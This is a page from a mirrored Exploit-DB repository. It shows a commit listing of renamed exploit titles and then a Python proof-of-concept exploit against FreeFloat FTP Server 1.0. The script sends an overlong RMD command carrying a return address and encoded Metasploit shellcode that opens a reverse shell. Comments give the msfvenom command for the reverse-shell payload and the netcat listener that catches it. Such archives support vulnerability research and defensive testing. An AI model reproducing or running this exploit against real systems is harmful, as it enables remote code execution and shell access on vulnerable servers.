bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/remote/40672.py
Offensive Security c76e893f94 DB: 2016-11-02 
12 new exploits

KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC)
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)

KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow

Apple iOS 4.0.3 - DPAP Server Denial of Service

KarjaSoft Sami FTP Server 2.02 - USER Overflow (Metasploit)
KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)

Freefloat FTP Server - (LIST command) Buffer Overflow
Freefloat FTP Server - 'LIST' Command Buffer Overflow
Freefloat FTP Server 1.00 - MKD Buffer Overflow
Freefloat FTP Server - MKD Buffer Overflow (Metasploit)
Freefloat FTP Server 1.0 - 'MKD' Buffer Overflow
Freefloat FTP Server - 'MKD' Buffer Overflow (Metasploit)

Freefloat FTP Server 1.0 - REST & PASV Buffer Overflow
Freefloat FTP Server 1.0 - 'REST' / 'PASV' Buffer Overflow

Freefloat FTP Server - REST Buffer Overflow (Metasploit)
Freefloat FTP Server - 'REST' Buffer Overflow (Metasploit)

Freefloat FTP Server 1.0 - ACCL Buffer Overflow
Freefloat FTP Server 1.0 - 'ACCL' Buffer Overflow

Nagios Plugin check_ups - Local Buffer Overflow (PoC)
Nagios Plugins check_ups - Local Buffer Overflow (PoC)

Joomla! Component KISS Advertiser - Remote File / Bypass Upload
Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload

Joomla! Component OS Property 2.0.2 - Unrestricted Arbitrary File Upload
Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload

Joomla! Component com_niceajaxpoll 1.3.0 - SQL Injection
Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection

Joomla! Extension Movm Extension (com_movm) - SQL Injection
Joomla! Component 'com_movm' - SQL Injection

Joomla! Component joomgalaxy 1.2.0.4 - Multiple Vulnerabilities
Joomla! Component 'com_joomgalaxy' 1.2.0.4 - Multiple Vulnerabilities

Joomla! Component En Masse 1.2.0.4 - SQL Injection
Joomla! Component 'com_enmasse' 1.2.0.4 - SQL Injection

Joomla! Component FireBoard (com_fireboard) - SQL Injection
Joomla! Component 'com_fireboard' - SQL Injection

Joomla! Component Spider Calendar Lite (com_spidercalendar) - SQL Injection
Joomla! Component 'com_spidercalendar' - SQL Injection

Joomla! Component RokModule - 'index.php module Parameter' Blind SQL Injection
Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection

Joomla! Component iCagenda - (id Parameter) Multiple Vulnerabilities
Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities
Joomla! Component FreeStyle Support com_fss 1.9.1.1447 - SQL Injection
Joomla! Component Tags - 'index.php tag Parameter' SQL Injection
Joomla! Component 'com_fss' 1.9.1.1447 - SQL Injection
Joomla! Component 'com_tag' - 'tag' Parameter SQL Injection
Joomla! Plugin Commedia - 'index.php task Parameter' SQL Injection
Joomla! Component Kunena - 'index.php search Parameter' SQL Injection
Joomla! Component 'com_commedia' - 'task' Parameter SQL Injection
Joomla! Component 'com_kunena' - 'search' Parameter SQL Injection

Freefloat FTP Server - PUT Command Buffer Overflow
Freefloat FTP Server - 'PUT' Command Buffer Overflow

Joomla! Component Spider Catalog - 'index.php Product_ID Parameter' SQL Injection
Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection

Free Float FTP Server - USER Command Buffer Overflow
Freefloat FTP Server - 'USER' Command Buffer Overflow

Joomla! Component JooProperty 1.13.0 - Multiple Vulnerabilities
Joomla! Component 'com_jooproperty' 1.13.0 - Multiple Vulnerabilities

Joomla! Component Spider Calendar - 'index.php date Parameter' Blind SQL Injection
Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection

Joomla! Component com_collector - Arbitrary File Upload
Joomla! Component 'com_collector' - Arbitrary File Upload

Freefloat FTP 1.0 - Raw Commands Buffer Overflow
Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow

Joomla! 3.0.2 - (highlight.php) PHP Object Injection
Joomla! 3.0.2 - 'highlight.php' PHP Object Injection

Joomla! Component RSfiles - (cid parameter) SQL Injection
Joomla! Component 'com_rsfiles' - 'cid' Parameter SQL Injection

Joomla! Component CiviCRM 4.2.2 - Remote Code Injection
Joomla! Component 'com_civicrm' 4.2.2 - Remote Code Injection

Freefloat FTP 1.0 - DEP Bypass with ROP
Freefloat FTP Server 1.0 - DEP Bypass with ROP

Joomla! 3.0.3 - (remember.php) PHP Object Injection
Joomla! 3.0.3 - 'remember.php' PHP Object Injection

Joomla! Extension DJ Classifieds 2.0 - Blind SQL Injection
Joomla! Component 'dj-classifieds' 2.0 - Blind SQL Injection

Joomla! Component S5 Clan Roster com_s5clanroster - 'index.php id Parameter' SQL Injection
Joomla! Component 'com_s5clanroster' - 'id' Parameter SQL Injection

Joomla! Component Sectionex 2.5.96 - SQL Injection
Joomla! Component 'com_sectionex' 2.5.96 - SQL Injection

Joomla! Component redSHOP 1.2 - SQL Injection
Joomla! Component 'com_redshop' 1.2 - SQL Injection

Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)
Joomla! Component 'com_media' - Arbitrary File Upload (Metasploit)

Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service

check_dhcp - Nagios Plugins 2.0.1 - Arbitrary Option File Read
Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read

check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition
Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition

Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation
Joomla! Component IDoEditor - 'image.php' Arbitrary File Upload
Joomla! Component jFancy - 'script.php' Arbitrary File Upload
Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload
Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload

Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload
Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload
Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component JCal Pro Calendar - SQL Injection
Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component 'com_jcalpro' - SQL Injection

Joomla! Component com_szallasok - 'id' Parameter SQL Injection
Joomla! Component 'com_szallasok' - 'id' Parameter SQL Injection

Joomla! Module Language Switcher 2.5.x - Multiple Cross-Site Scripting Vulnerabilities
My Little Forum 2.3.7 - Multiple Vulnerabilities

Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion

Joomla! Component Odudeprofile - 'profession' Parameter SQL Injection
Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection

Joomla! Component com_photo - Multiple SQL Injections
Joomla! Component 'com_photo' - Multiple SQL Injections

Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities
Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities

Joomla! Component Komento - 'cid' Parameter SQL Injection
Joomla! Component 'Komento' - 'cid' Parameter SQL Injection

Joomla! Component com_quiz - SQL Injection
Joomla! Component 'com_quiz' - SQL Injection

Joomla! Component com_parcoauto - 'idVeicolo' Parameter SQL Injection
Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection
Joomla! Component ZT Autolinks - 'Controller' Parameter Local File Inclusion
Joomla! Component Bit - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_bit' - 'Controller' Parameter Local File Inclusion

Joomla! Component Incapsula - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component 'com_incapsula' - Multiple Cross-Site Scripting Vulnerabilities

Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation
Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation

Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)
Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)

Joomla! Component RokDownloads - Arbitrary File Upload
Joomla! Component 'com_rokdownloads' - Arbitrary File Upload

Apple Intel HD 3000 Graphics driver 10.0.0 - Privilege Escalation
Apple Intel HD 3000 Graphics Driver 10.0.0 - Privilege Escalation

MyLittleForum 2.3.5 - PHP Command Injection
My Little Forum 2.3.5 - PHP Command Injection
Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free
OS X/iOS Kernel - IOSurface Use-After-Free
OS X/iOS - mach_ports_register Multiple Memory Safety Issues
Apple OS X - Kernel IOBluetoothFamily.kext Use-After-Free
Apple OS X/iOS - Kernel IOSurface Use-After-Free
Apple OS X/iOS - mach_ports_register Multiple Memory Safety Issues

MacOS 10.12 - 'task_t' Privilege Escalation
Apple MacOS 10.12 - 'task_t' Privilege Escalation
Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow
School Registration and Fee System - Authentication Bypass
Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow
MySQL / MariaDB / PerconaDB - 'mysql' System User Privilege Escalation / Race Condition
MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation
2016-11-02 05:01:19 +00:00

63 lines
2.3 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
#Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command
#Date: 29 Octubre 2016
#Exploit Author: Karri93
#Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#Version: 1.0
#Tested on: Windows XP Profesional SP3 Spanish x86
#Shellcode Metasploit:
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c
#nc -lvp 443
ret= "\x2F\x1D\xF1\x77" #GDI32.dll
shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71"
"\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1"
"\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f"
"\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61"
"\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78"
"\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0"
"\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72"
"\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0"
"\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83"
"\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35"
"\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50"
"\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b"
"\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68"
"\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27"
"\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0"
"\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21"
"\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24"
"\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2"
"\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a"
"\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e"
"\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04"
"\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb"
"\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25"
"\xce\x7e\xdd\x9a\xef\xaa")
buffer= '\x90'*30 + shellcode
buffer1= '\x41' * 248 + ret + buffer + '\x43'*(696-len(buffer))
print "Sending..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.1.150',21))
s.recv(1024)
s.send('USER free\r\n')
s.recv(1024)
s.send('PASS free\r\n')
s.recv(1024)
s.send('RMD' + buffer1 + '\r\n')
s.close()
Reference in a new issue View git blame Copy permalink